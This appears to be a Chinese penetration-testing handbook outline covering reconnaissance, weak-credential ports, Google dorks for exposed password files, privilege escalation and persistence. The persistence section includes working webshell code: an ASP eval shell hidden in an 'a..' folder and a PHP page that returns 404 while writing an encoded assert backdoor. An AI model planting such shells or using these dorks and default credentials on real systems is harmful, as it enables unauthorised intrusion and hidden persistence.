[网络协议]渗透测试-红/蓝队工作手册（持续更新）

资产情报收集

域名

域名注册人信息收集

http://whois.chinaz.com/

子域名爆破

域传送漏洞

工具

• dnsenum
• Layer 子域名挖掘机
• subDomainsBrute
• wydomain

cdn 绕过 -->真实目标

引擎

搜索引擎

google

收集域名/email

theHarvester

google_hack

搜索敏感文件

• site:xxx.com filetype:doc intext:pass
• site:xxx.com filetype:xls intext:pass
• site:xxx.com filetype:conf
• site:xxx.com filetype:inc

搜索敏感后台

• site:xxx.com 管理
• site:xxx.com admin
• site:xxx.com login

搜索email

• site:xxx.com intext:@xxx.com
• intext:@xxx.com

搜索敏感web路径

• site:xxx.com intitle:mongod inurl:28017
• site:xxx.com inurl:sql.php
• site:xxx.com inurl:phpinfo.php

bing.cn

sogou.com

网络组件引擎

shodan.io

fofa.info

zoomeye.org

?

ip

c段ip

服务器操作系统类型

端口开放 和 服务识别

目标网络结构

tracert

工具

• nmap

同服站点

dns.aizhan.com

容易忽略的点

github 敏感信息泄露

综合工具

ARL资产灯塔系统

https://gitee.com/mucn/arl-asset-lighthouse
https://blog.csdn.net/qq_33608000/article/details/123544185

IVRE 开源网络扫描框架

https://blog.csdn.net/qq_33608000/article/details/123543643

外网入口点

弱点端口 扫描

• 21 ftp 是否支持匿名 弱口令

• 22 ssh 弱口令

• 23 telnet 弱口令

• 80 web 常见web漏洞poc 一些 后台 弱口令

• 161 snmp public弱口令

• 389 ldap 是否匿名访问

• 443 openssl 心脏出血 web漏洞测试poc

• 445 smb 弱口令 ms_08067溢出

• 875 rsync 匿名访问 弱口令

• 1433 mssql 弱口令

• 1521 oracle 弱口令

• 2601，2604 zebra路由 默认密码zebra

• 3128 squid代理默认端口 口令没设置 直接内网漫游

• 3306 mysql 弱口令

• 3389 windows远程桌面 弱口令
  -------前人足迹
  shift后门
  放大镜
  ------输入法漏洞

• 4440 rundeck web 自动化 开源软件

• 4848 GlassFish web管理控制台中间件 弱口令admin/adminadmin

• 5432 Postgresql 弱口令

• 5900，5901，vnc 弱口令

• 6379 redis 一般无认证

• 7001，7002 web中间件weblogic 弱口令

• 8080 web中间件 tomcat 弱口令 很多漏洞

• 8080 web中间件 jboss 不认证 弱口令 很多漏洞

• 8000-9090 web常见端口 运维管理后台 弱口令

• 9000 fcgi fcgi php 执行

• 9200 elasticsearch 代码执行

• 9043 web中间件 WebSphere 弱口令
  admin/admin
  WebSphere/WebSphere
  system/manager

• 11211 分布式的高速缓存系统memcache 内存泄漏

• 27017 MongoDB 未授权访问

• 28017 MongoDB统计页面

• 50060 Hadoop web

工具

nmap

https://blog.csdn.net/qq_33608000/article/details/123420513

hscan

hydra

自写扫描器

黑盒渗透

banner识别

whatweb

webfile扫描

网站备份扫描

文件目录遍历

可能未授权访问url

工具

御剑后台扫描珍藏版（完善字典）

weakfilescan

sql注入

sqlmap

https://blog.csdn.net/qq_33608000/article/details/122743601

xss

后台设计问题

无验证码 弱口令

万能密码

cookie欺骗

任意文件上传

文件包含/读取

编辑器漏洞

FCKeditor

服务器解析漏洞

eWebEditor

KindEditor

xxe

web漏洞扫描器

wvs

常见cms识别 cms getshel exp

email 服务器

出现web漏洞

xxs

sql

xxe

心脏出血

破壳漏洞

弱口令

email钓鱼

很有可能 email是 外网入口

传递vpn密码

服务器密码

权限稳固 与 提升

web后门 隐藏

将shell写入图片 include包含

一种隐藏在jpg图片EXif中的后门

创建隐藏的文件夹 写入shell

 C:\Intelpub\wwwroot>md  C:\Intelpub\wwwroot\a..\
 C:\Intelpub\wwwroot>echo "<%execute(request("1"))%>" >\\.\ C:\Intelpub\wwwroot\a..\aux.asp

shell 地址： http://ip/a./aux.asp

• win2003 webshell权限
• aspx脚本无效

Easy File locker 驱动 隐藏文件

• win2003

404马

 <?php
 header("HTTP/1.1 404");
 ob_start();
 @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/pg=='));
 ob_end_clean();
 ?>

?

php 脚本类型

避免关键字

顽固木马

权限提升

windows

EXP 溢出

能否执行命令
32 64 exp 收集

探测其他脚本

php 是否 system权限

tomcat

jspshell 看权限是否 system

mysql 提权

root提权

udf提权
MOF提权

mssql提权

• sa权限 xp_cmdshell

• db_owner提权
  在db_owner所在管理 表中
  创建触发器
  等管理员 用sa 去执行 插入表命令 触发提权

oracle提权

• DBA权限
  利用java 访问系统文件、执行命令

• 低权限
  获取os访问权限

servu提权

pcanywhere提权

星外提权

Linux

exp

• 无法反弹 如何提权

jsp容器

可能root

mysql

root

cat /etc/password

ps aux |grep root

进程 溢出

权限维持

提权后 信息收集

被动侦查

? 开源网络情报（OSINT）

信息泄露 目录结构 logo

burst

?

目录结构爆破

? dirsearch https://blog.csdn.net/qq_33608000/article/details/122510374

? Dirbuster https://blog.csdn.net/qq_33608000/article/details/123493351

2 权限提升 容器逃逸

3 持久化免杀方法整理 与 Rootkit木马的研究

4 研究开源的主机发现 指纹识别 内网信息 网络拓扑 收集的方法

5横向渗透

6 域内本地凭证/关键文件收集

7 擦屁股

附上：

基础知识

Linux命令

https://blog.csdn.net/qq_33608000/article/details/122729254

docker

https://blog.csdn.net/qq_33608000/article/details/108921270

实战手册

https://blog.csdn.net/qq_33608000/article/details/123402159

工具

goby

https://blog.csdn.net/qq_33608000/article/details/113375671

awvs

https://blog.csdn.net/qq_33608000/article/details/123416620

burp

https://blog.csdn.net/qq_33608000/article/details/123476991

Xray

https://blog.csdn.net/qq_33608000/article/details/106319173

matasploit

https://blog.csdn.net/qq_33608000/article/details/122510354

KaliLinux

https://blog.csdn.net/qq_33608000/article/details/122727733

嗅探

wireshark

https://blog.csdn.net/qq_33608000/article/details/103745234

权限维持

Cobalt strike

https://blog.csdn.net/qq_33608000/article/details/122013161

漏洞原理知识整理

burst

https://blog.csdn.net/qq_33608000/article/details/123099340

xss

https://blog.csdn.net/qq_33608000/article/details/122742733

csrf

https://blog.csdn.net/qq_33608000/article/details/123416850

sql注入

https://blog.csdn.net/qq_33608000/article/details/123428673

RCE

https://blog.csdn.net/qq_33608000/article/details/123474500

文件包含/下载/上传

https://blog.csdn.net/qq_33608000/article/details/123474670

越权访问

https://blog.csdn.net/qq_33608000/article/details/123474748

目录遍历

https://blog.csdn.net/qq_33608000/article/details/123474748

反序列化

https://blog.csdn.net/qq_33608000/article/details/123474800

XXE

https://blog.csdn.net/qq_33608000/article/details/123474842

URL重定向

SSRF

https://blog.csdn.net/qq_33608000/article/details/123424965

waf绕过

https://blog.csdn.net/qq_33608000/article/details/123474929

CRLF

https://blog.csdn.net/qq_33608000/article/details/123420682

LDAP

https://blog.csdn.net/qq_33608000/article/details/123470664

命令注入

https://blog.csdn.net/qq_33608000/article/details/103268464

逻辑漏洞

https://blog.csdn.net/qq_33608000/article/details/123493758

漏洞复现